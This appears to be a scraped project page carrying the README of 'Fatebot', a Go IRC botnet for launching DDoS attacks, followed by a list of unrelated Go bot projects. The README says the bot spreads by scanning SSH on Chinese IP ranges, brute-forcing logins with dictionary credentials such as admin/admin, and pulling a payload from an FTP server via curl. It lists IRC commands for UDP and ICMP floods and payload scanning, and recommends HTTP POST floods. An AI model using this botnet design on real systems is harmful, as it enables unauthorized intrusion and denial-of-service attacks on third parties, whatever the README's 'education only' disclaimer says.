This is my first IRC bot for launch ddos attack, Write on Go language.

Attention Attention!!! My english is terrible. I'm so sorry about that :(

Fatebot v0.1

This is my first IRC bot for launch ddos attack, Write on Go language. For education purpose only. Please test it on your lab. And i create this for join university in the future not for attack anyone server with out any permission!!!

IRC commands are in the bottom of The page.

Dr Fate

Infect

The infect function of this botnet is scanning by SSH port(default as 22) and login by dictionary attack. like username "admin" and password "admin". (Scan by range of CHN network. You can add more or change it, if you want.) This botnet use curl to get payload from FTP server, so... please prepair your FTP server first, It very important for infect process.

I scan on my private netowrk in SSH range(1-5), And comment a function of running session.(That why bot is not join The server.) SSH scan

DDoS

Raw socket programming is really hard for me. That's why all of The volumetric are a simple like udp and icmp flood. Mainly DDoS function is on The Application layer, And my recommand is a HTTP post flood.

http post flood, dos example

Tutorial

I'm lazy now.

IRC Commands

  • ?udp [ip] [size]
    • ?udp 192.168.1.16 500
    • - Flood UDP packets by random src and dst port to target.

      - Min and Max of Buffer is 1 - 700bytes.

  • ?icmp [ip]
    • ?icmp 192.168.1.16
    • - Flood ICMP with large packets to target.
  • ?scan [ftp server]
    • ?scan ftp://192.186.1.16/payload
    • - Scan CHN ip range on SSH port and get payload with cURL.
  • ?kill
    • - Remove payload on bot machine and left the server.
  • ?stop.ddos
    • - Stop ddos attacking.
  • ?stop.scan
    • - Stop scanning.
Similar Resources

Quote-bot - Un bot utilisant l'API Twitter pour tweeter une citation par jour sur la programmation et les mathématiques.

Description Ceci est un simple bot programmé en Golang qui tweet une citation sur la programmation tout les jours. Ce bot est host sur le compte Twitt

Jan 1, 2022

Discord-bot - A Discord bot with golang

JS discord bots Install Clone repo git clone https://github.com/fu-js/discord-bo

Aug 2, 2022

Bot - Telegram Music Bot in Go

Telegram Music Bot in Go An example bot using gotgcalls. Setup Install the serve

Jun 28, 2022

Pro-bot - A telegram bot to play around with the community telegram channels

pro-bot 🤖 Pro Bot A Telegram Bot to Play Around With The Community Telegram Cha

Jan 24, 2022

Slack-emoji-bot - This Slack bot will post the newly created custom Slack emojis to the channel of your choice

Slack Emoji Bot This Slack bot will post the newly created custom Slack emojis t

Oct 21, 2022

Sex-bot - The sex bot and its uncreative responses

Sex-bot - The sex bot and its uncreative responses

Sex Bot The sex bot, made with golang! The sex bot can't hear the word "sexo" he

Nov 11, 2022

Feline-bot - Feline Bot for Discord using Golang

Feline Bot for Discord Development This bot is implemented using Golang. Feature

Feb 10, 2022

whatsapp bot made with Google language

whatsapp bot made with Google language

go-whatsapp Package rhymen/go-whatsapp implements the WhatsApp Web API to provide a clean interface for developers. Big thanks to all contributors of

Sep 27, 2021

YouTube downloader bot for Telegram written in the Go programming language

ytdGoBot YouTube downloader bot for Telegram written in the Go programming language. For now it only downloads audio content from a provided YouTube l

Apr 15, 2022
Related tags
IRC, Slack, Telegram and RocketChat bot written in go
IRC, Slack, Telegram and RocketChat bot written in go

go-bot IRC, Slack & Telegram bot written in Go using go-ircevent for IRC connectivity, nlopes/slack for Slack and Syfaro/telegram-bot-api for Telegram

Dec 20, 2022
The Tenyks IRC bot.

Tenyks is a computer program designed to relay messages between connections to IRC networks and custom built services written in any number of languages.

Sep 26, 2022
Jaken - A general purpose IRC bot featuring user acls and arbitrary plugins

Design principles This bot is based on the premise of a loosely coupling between

Jul 21, 2022
Bot-template - A simple bot template for creating a bot which includes a config, postgresql database

bot-template This is a simple bot template for creating a bot which includes a c

Sep 9, 2022
go irc client for twitch.tv

go-twitch-irc This is an irc client for connecting to twitch. It handles the annoying stuff like irc tag parsing. I highly recommend reading the docum

Dec 27, 2022
A modern IRC server (daemon/ircd) written in Go.
A modern IRC server (daemon/ircd) written in Go.

Oragono is a modern IRC server written in Go. Its core design principles are: Being simple to set up and use Combining the features of an ircd, a serv

Dec 31, 2022
A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertisement Campaigns
A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertisement Campaigns

discord-mass-DM-GO A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertise

Jan 2, 2023
Golang bot that connects to slack using Socketclient to read and write messages.
Golang bot that connects to slack using Socketclient to read and write messages.

?? (not)simple go project ?? Golang bot that connects to slack using Socketclient to read and write messages. ?? Use ?? @SquidBot : Mentions your name

Aug 23, 2022
A bot based on Telegram Bot API written in Golang allows users to download public Instagram photos, videos, and albums without receiving the user's credentials.

InstagramRobot InstagramRobot is a bot based on Telegram Bot API written in Golang that allows users to download public Instagram photos, videos, and

Dec 16, 2021
Dlercloud-telegram-bot - A Telegram bot for managing your Dler Cloud account

Dler Cloud Telegram Bot A Telegram bot for managing your Dler Cloud account. Usa

Dec 30, 2021